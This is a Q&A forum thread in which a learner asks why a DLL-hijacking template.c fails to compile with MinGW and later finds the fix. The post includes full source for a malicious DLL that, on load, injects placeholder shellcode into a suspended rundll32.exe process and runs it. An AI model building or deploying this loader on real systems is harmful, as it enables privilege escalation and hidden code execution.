# Privilege Escalation using DLL Hijacking - error while compiling "template.c"

Tags: windows

I'm learning about DLL Hijacking, going step by step this video made by Vivek - [Privilege Escalation using DLL Hijacking](https://www.youtube.com/watch?v=e_l5TCgw3wo)

Everything is very well explained, but there is one passage that is getting me in  trouble. It's about compiling "template.c" with mingw32 on Kali Linux. When I'm doing the same thing as is described in video, means:

> root@kali:~# i686-w64-mingw32-gcc-win32 template.c -o template.dll
>   -shared

I'm still getting this error:

> /tmp/ccRJy0bd.o:template.c:(.text+0x49): undefined reference to
>   `inline_bzero' collect2: error: ld returned 1 exit status

Here is source code of "template.c"

```
#include <windows.h>
#include "template.h"

#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{

           BYTE *q = (BYTE *)p;
           size_t x = 0;
           for (x = 0; x < l; x++)
                     *(q++) = 0x00;
}

#endif


void ExecutePayload(void);

BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
        case DLL_PROCESS_ATTACH:
            ExecutePayload();
            break;

        case DLL_PROCESS_DETACH:
            // Code to run when the DLL is freed
            break;

        case DLL_THREAD_ATTACH:
            // Code to run when a thread is created during the DLL's lifetime
            break;

        case DLL_THREAD_DETACH:
            // Code to run when a thread ends normally.
            break;
    }
    return TRUE;
}

void ExecutePayload(void) {
    int error;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    CONTEXT ctx;
    DWORD prot;
   LPVOID ep;

    // Start up the payload in a new process
    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);

    // Create a suspended process, write shellcode into stack, make stack RWX, resume it
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);

       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);

#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif

        SetThreadContext(pi.hThread,&ctx);

        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   // ExitProcess(0);
   ExitThread(0);
}

/*
typedef VOID
(NTAPI *PIMAGE_TLS_CALLBACK) (
    PVOID DllHandle,
    ULONG Reason,
    PVOID Reserved
    );

VOID NTAPI TlsCallback(
      IN PVOID DllHandle,
      IN ULONG Reason,
      IN PVOID Reserved)
{
    __asm  ( "int3" );
}

ULONG _tls_index;
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
*/
```

And "template.h", if needed.

```
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";
```

***Solved.***

Just remove "#if BUILDMODE == 2" and "#endif" lines, then compilation is successfully done.

Comment: This sounds like a question stackoverflow would be better off handling.

Comment: You probably also want to post your code.  At first glance though, it seems as if there's a function inline_bzero, which you reference, but don't define.

Comment: If I will have no answer, I will try stackoverflow. It still has something to do with a security. Btw, thanks for point, source code has been added. I forget.

Comment: Damn.. I finally solved it. I forget to remove lines with "#if BUILDMODE == 2" and "#endif". After it, compilation has been done successfully.

Comment: Please post the solution as an 'answer', and accept it.  That way if someone else has this question in the future they don't have to read through the comments.  Also you get points for it.

Comment: This is not a security question, this question is only about a compiling error.

Answer (score 1):

Just remove `#if BUILDMODE == 2` and `#endif` lines, then compilation is successfully done.